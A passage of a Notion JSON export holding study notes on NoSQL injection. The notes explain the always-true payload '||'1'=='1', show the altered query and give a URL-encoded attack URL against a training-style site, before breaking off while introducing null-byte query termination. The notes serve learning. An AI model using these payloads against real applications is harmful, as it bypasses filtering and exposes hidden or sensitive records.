conditions","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-80a3-8df2-c10913e0deb5","parent":{"type":"block_id","block_id":"250dc9c5-3059-8028-8817-ff37a08f34da"},"created_time":"2025-08-15T14:55:00.000Z","last_edited_time":"2025-08-15T14:55:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"This basically means ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This basically means ","href":null},{"type":"text","text":{"content":"changing the logic of a database query","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"changing the logic of a database query","href":null},{"type":"text","text":{"content":" so that it no longer behaves the way the application intended.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" so that it no longer behaves the way the application intended.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8026-af5b-e39eb5f19322","parent":{"type":"block_id","block_id":"250dc9c5-3059-8028-8817-ff37a08f34da"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T14:55:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"So, Instead of just testing for vulnerabilities, now you want to ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"So, Instead of just testing for vulnerabilities, now you want to ","href":null},{"type":"text","text":{"content":"change the query’s logic","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"change the query’s logic","href":null},{"type":"text","text":{"content":" to always return results (or later do more damage).","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" to always return results (or later do more damage).","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-805d-b4ad-efe8d69fd695","parent":{"type":"block_id","block_id":"250dc9c5-3059-8028-8817-ff37a08f34da"},"created_time":"2025-08-15T14:59:00.000Z","last_edited_time":"2025-08-15T14:59:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Two main methods:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Two main methods:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8093-93a8-d6919b9587f9","parent":{"type":"block_id","block_id":"250dc9c5-3059-8028-8817-ff37a08f34da"},"created_time":"2025-08-15T14:59:00.000Z","last_edited_time":"2025-08-15T18:06:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Add a condition that’s always true","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Add a condition that’s always true","href":null},{"type":"text","text":{"content":" (","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (","href":null},{"type":"text","text":{"content":"’|| '1'=='1","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"’|| '1'=='1","href":null},{"type":"text","text":{"content":")","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":")","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8093-b3ea-df2ec7f76f43","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Payload: ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Payload: ","href":null},{"type":"text","text":{"content":"'||'1'=='1","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'||'1'=='1","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8042-8c1b-c936a8da5d01","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"'","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'","href":null},{"type":"text","text":{"content":" → Breaks out of the original string in the query.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" → Breaks out of the original string in the query.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-806a-a1a5-f22e733d8e88","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"||","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"||","href":null},{"type":"text","text":{"content":" → Logical OR operator (if either side is true, the whole thing is true).","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" → Logical OR operator (if either side is true, the whole thing is true).","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ec-9af2-fe27103226f6","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"'1'=='1'","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'1'=='1'","href":null},{"type":"text","text":{"content":" → A condition that is ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" → A condition that is ","href":null},{"type":"text","text":{"content":"always true","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"always true","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-801d-9bab-c14b6c09e655","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-80cc-aba8-c50dc43257f6","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"How does this modify the query?","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"How does this modify the query?","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ad-9b81-decae5ac4749","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Original query (what the app intended):","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Original query (what the app intended):","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-803d-a948-f7a887b5cf49","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"this.category == 'fizzy'","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"this.category == 'fizzy'","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"250dc9c5-3059-8063-9a29-c17249196919","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T18:07:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query after injection the payload ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query after injection the payload ","href":null},{"type":"text","text":{"content":"(","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"(","href":null},{"type":"text","text":{"content":"'||'1'=='1","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'||'1'=='1","href":null},{"type":"text","text":{"content":")","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":")","href":null},{"type":"text","text":{"content":":","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":":","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8075-8759-c0f84c293d97","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"this.category == 'fizzy' || '1'=='1'","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"this.category == 'fizzy' || '1'=='1'","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"250dc9c5-3059-806e-8db6-ddb13a0f1186","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Because ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Because ","href":null},{"type":"text","text":{"content":"'1'=='1'","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'1'=='1'","href":null},{"type":"text","text":{"content":" is always true, ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" is always true, ","href":null},{"type":"text","text":{"content":"the database returns all products","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"the database returns all products","href":null},{"type":"text","text":{"content":", not just “fizzy” drinks.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", not just “fizzy” drinks.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-803b-a530-cdc003851d47","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-801f-991d-d1513f1e64a9","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Why is this dangerous?","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Why is this dangerous?","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80cc-abe8-d7b618ce0a1e","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"It bypasses any filtering, authentication, or restrictions.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"It bypasses any filtering, authentication, or restrictions.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8044-9d43-f05590aa3dde","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"You might see ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"You might see ","href":null},{"type":"text","text":{"content":"hidden categories or sensitive records","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"hidden categories or sensitive records","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8079-b0ff-d2b4c079621a","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If the same input is used in other parts of the backend (e.g., UPDATE or DELETE queries), you could unintentionally update or delete ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the same input is used in other parts of the backend (e.g., UPDATE or DELETE queries), you could unintentionally update or delete ","href":null},{"type":"text","text":{"content":"everything","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"everything","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80f4-9d32-df4daaf2d872","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-80ff-a8b6-cd54dd4c1855","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Why does the URL look so weird?","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Why does the URL look so weird?","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8045-b4a7-dc82d490f114","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"The browser encodes special characters (so they travel safely over HTTP).","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"The browser encodes special characters (so they travel safely over HTTP).","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80f3-a9cc-e205c386dcdb","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"'","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'","href":null},{"type":"text","text":{"content":" becomes ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" becomes ","href":null},{"type":"text","text":{"content":"%27","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"%27","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ae-8114-eb481100d9c9","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"||","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"||","href":null},{"type":"text","text":{"content":" becomes ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" becomes ","href":null},{"type":"text","text":{"content":"%7c%7c","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"%7c%7c","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-809c-b45f-fb9a3f9e4035","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"==","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"==","href":null},{"type":"text","text":{"content":" becomes ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" becomes ","href":null},{"type":"text","text":{"content":"%3d%3d","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"%3d%3d","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-805d-989b-cd0961db8438","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"So the full URL:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"So the full URL:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ff-b417-c56cefe0157a","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"https://insecure-website.com/product/lookup?category=fizzy%27%7c%7c%27%31%27%3d%3d%27%31","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"https://insecure-website.com/product/lookup?category=fizzy%27%7c%7c%27%31%27%3d%3d%27%31","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"250dc9c5-3059-80dc-8573-c90474ceb658","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"is just a URL-encoded form of:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"is just a URL-encoded form of:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8046-a0ae-e438503fc62d","parent":{"type":"block_id","block_id":"250dc9c5-3059-8093-93a8-d6919b9587f9"},"created_time":"2025-08-15T14:47:00.000Z","last_edited_time":"2025-08-15T15:00:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"fizzy'||'1'=='1","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"fizzy'||'1'=='1","href":null}],"language":"plain text"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab","parent":{"type":"block_id","block_id":"250dc9c5-3059-8028-8817-ff37a08f34da"},"created_time":"2025-08-15T14:59:00.000Z","last_edited_time":"2025-08-15T18:10:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Terminate the query early","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Terminate the query early","href":null},{"type":"text","text":{"content":" with a null character (","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" with a null character (","href":null},{"type":"text","text":{"content":"\\u0000","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"\\u0000","href":null},{"type":"text","text":{"content":")","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":")","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8079-8c2a-c757e031aa86","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Some queries have extra conditions, for example:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Some queries have extra conditions, for example:","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-806a-b361-f69009b9aafa","parent":{"type":"block_id","block_id":"250dc9c5-3059-8079-8c2a-c757e031aa86"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"this.category == 'fizzy' && this.released == 1","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"this.category == 'fizzy' && this.released == 